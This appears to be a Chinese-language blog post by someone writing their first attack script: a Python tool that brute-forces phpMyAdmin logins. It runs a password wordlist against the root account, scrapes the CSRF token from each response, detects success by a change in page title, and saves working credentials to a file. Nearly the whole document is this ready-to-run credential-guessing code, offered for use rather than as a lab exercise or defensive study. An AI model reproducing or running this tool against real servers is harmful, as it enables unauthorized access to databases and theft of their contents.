爆破phpmyadmin
- 因为是第一次写脚本,所以没有爆破phpmyadmin的思路
- 后来百度到很多爆破phpmyadmin的脚本,找到了一些思路
- 大概就是用python构造对phpmyadmin的登录请求,根据登录前后的源码中的一些不同的信息判断是否登录成功,我们又从发送的请求包中获取了请求参数,以及文件头信息：pma_username=roofffffft&pma_password=fffroot&server=1&token=3b88f0df1d082083aae8b4cccba4055e
- 思路逐渐清晰,先定义 url、user、passdic(密码字典)、headers、session 和 token
- 重复获取token以及title信息
- 构造payload发送请求
- 用re.findall提取title,对登录前后的title进行比对
import html
import re
import requests
# Target, account and wordlist path; one shared Session so cookies set by the
# login page are carried into the POSTs that follow.
url = 'http://url/index.php'
user = 'root'
passdic = '字典路径'
s = requests.Session()
# Assigning a plain dict replaces the Session's default header set rather
# than merging into it; every request then carries this fixed User-Agent,
# which is one of the constants a server-side log review can key on.
s.headers = {
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
}
def get_token(text) -> str:
    """Extract the CSRF ``token`` hidden-input value from a phpMyAdmin page.

    Args:
        text: Raw HTML of a response body.

    Returns:
        The HTML-unescaped value of the first ``<input name="token"
        value="..." />`` occurrence, or ``None`` when the page has no
        such field (despite the ``str`` annotation).
    """
    match = re.search(r'name="token" value="(.*?)" />', text)
    if match is None:
        return None
    return html.unescape(match.group(1))
def get_title(text) -> str:
    """Return the contents of the first ``<title>`` element in *text*.

    The pattern is greedy (``.*``), so when two title tags sit on one line
    the result runs from the first opening tag to the last closing tag on
    that line.  Returns ``None`` when no title element is found.
    """
    match = re.search(r'<title>(.*)</title>', text)
    return None if match is None else match.group(1)
def try_login(user, pwd, token):
    """POST one credential pair to the login form and return the response body.

    Uses the module-level session ``s`` and target ``url``.  ``token`` is
    the CSRF value scraped from the previous response by ``get_token``;
    ``server`` is sent as the integer 1, which is form-encoded as ``'1'``.

    Returns:
        The decoded response text, which the caller inspects for the page
        title and the next token.
    """
    form = dict(
        pma_username=user,
        pma_password=pwd,
        server=1,
        target='index.php',
        token=token,
    )
    response = s.post(url, data=form)
    return response.text
def fuck_pma():
    """Run the wordlist in ``passdic`` against ``user`` on the login form.

    A first login with empty credentials records the failure page's title
    and the initial CSRF token.  Each later attempt is judged only by
    comparing its title against that baseline: a differing title is taken
    as success, appended to ``success.txt`` and the loop stops.  The token
    is re-read from every response, as the script assumes it can change
    between requests.

    Every attempt is one POST to ``url`` from the same session and fixed
    User-Agent, so the run shows up as a burst of failed logins in the
    web-server access log and in any rate limiting placed in front of the
    login page.
    """
    with open(passdic, 'r', encoding='utf-8') as wordlist:
        page = try_login('', '', '')
        failed_title = get_title(page)
        token = get_token(page)
        for raw in wordlist:
            pwd = raw.strip()
            print(f'[?] 尝试登陆 {user} {pwd} ')
            page = try_login(user, pwd, token)
            current_title = get_title(page)
            token = get_token(page)
            if current_title == failed_title:
                print(f'[×] 登陆失败 {current_title}')
                continue
            print(f'[√] 登陆成功 {current_title}')
            # Separate name for the output handle so the wordlist handle is
            # not shadowed while the result line is written.
            with open('success.txt', 'a', encoding='utf-8') as out:
                out.write(f'{url} | {user} | {pwd}\n')
            break
if __name__ == "__main__":
    # Any exception from the run (unreachable host, missing wordlist, ...)
    # is printed without a traceback and the process exits normally.
    try:
        fuck_pma()
    except Exception as err:
        print(err)